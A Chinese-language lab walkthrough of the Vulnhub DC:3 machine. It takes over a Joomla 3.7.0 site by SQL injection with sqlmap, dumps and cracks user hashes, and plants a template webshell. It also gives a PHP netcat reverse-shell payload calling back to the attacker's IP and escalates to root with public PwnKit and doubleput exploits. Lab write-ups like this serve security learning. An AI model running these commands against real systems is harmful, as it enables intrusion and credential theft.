Vulnhub | DC: 3 |【实战】

写在前面

靶场链接:
https://www.vulnhub.com/entry/dc-32,312/

有些知识点在DC:1中提到,可以翻阅

DC:1

注意该靶场仅需获取唯一FLAG。(需提权至root)

开启时,有一个连接设备的报错(VMware),像如下修改即可,修改DC_3.vmx
在这里插入图片描述

信息搜集

扫描c段,这里115是攻击机,159是靶机,141为物理机,61为网关
在这里插入图片描述
端口扫描,查到80端口
在这里插入图片描述
进入,看到网页
在这里插入图片描述
指纹识别出是joomla CMS

在这里插入图片描述

MSF

使用msf搜索是否有现成的,这里搜查到不少检测模块和入侵模块
在这里插入图片描述
继续信息收集,确定poc范围,查找scanner有好几个,这里我都试了试
在这里插入图片描述
这里暴力枚举登录,但是并未成功在这里插入图片描述
gallerywd扫描没出东西
在这里插入图片描述
page枚举,也仅仅发现很少的网页
在这里插入图片描述
插件扫描,可以看到有一些sql注入的点
在这里插入图片描述
版本扫描,查到版本为3.7.0
在这里插入图片描述
有了上述的信息,我们可以更进一步,更加具体的打poc3.7有大量SQL注入
在这里插入图片描述
第二个版本号吻合,查看该poc,调sqlmap
在这里插入图片描述
使用该命令,查到mysql版本,数据库
在这里插入图片描述
指定 joomladb 数据库,查表
在这里插入图片描述
显然有一个 #__users 表,大概率有敏感信息,指定该表,查到列
在这里插入图片描述
显然,这里有敏感列名,使用以下payload dump出数据

sqlmap -u "http://192.168.201.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb -T \#__users -C "username,password" --dump

得到密码hash
在这里插入图片描述
使用john爆破,注意这里首先将密文存储为文件,爆破出密码为snoopy
在这里插入图片描述
使用用户密码登录,注意是登录后台 /administrator
在这里插入图片描述
在模板文件中注入木马
在这里插入图片描述
蚁剑连接
在这里插入图片描述

Pkexec 提权

连接进来,首先查看suid文件,准备suid提权。这里其实并没有太大的发现,suid文件比较常规。但是由于不久前出的pwnkit巨大漏洞,几乎对以前版本的pkexec是通杀,首先可以测一下pkexec漏洞
在这里插入图片描述
poc地址

https://github.com/berdav/CVE-2021-4034

CVE-2021-4034 在这里不做讲解,仅作利用,使用这个漏洞可以直接获得root权限
通过蚁剑上传文件,非常方便

在这里插入图片描述
编译并执行poc
在这里插入图片描述
探测出易受该漏洞攻击,准备使用这个提权。由于蚁剑的虚拟终端并不是持久性的,它是通过命令执行模拟的,(提权后需要持续性交互)所以这里先反弹一个shell出来。

借鉴的其他同学的payload,适用于php,保存后前往主页即可触发

<?php 
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.201.115 2333 >/tmp/f');
?> 

在这里插入图片描述
攻击机监听后弹回shell
在这里插入图片描述
执行漏洞poc,直接获取root权限
在这里插入图片描述
得到flag
在这里插入图片描述

ubuntu 16.04提权

较老的方法,也是本题的大多数解法,这里,首先信息收集内核,版本等等信息,是ubuntu 16.04
在这里插入图片描述
expdb中查找是否含有该版本的poc,发现是有的,那个centos 7 非常符合
在这里插入图片描述
打开poc,找到exp下载地址
在这里插入图片描述
下载地址如下

https://bugs.chromium.org/p/project-zero/issues/detail?id=808

下载完毕后上传该poc至被害主机中
在这里插入图片描述
解压
在这里插入图片描述
编译后运行

./compile.sh

./doubleput

在这里插入图片描述
提权成功,找到flag文件
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值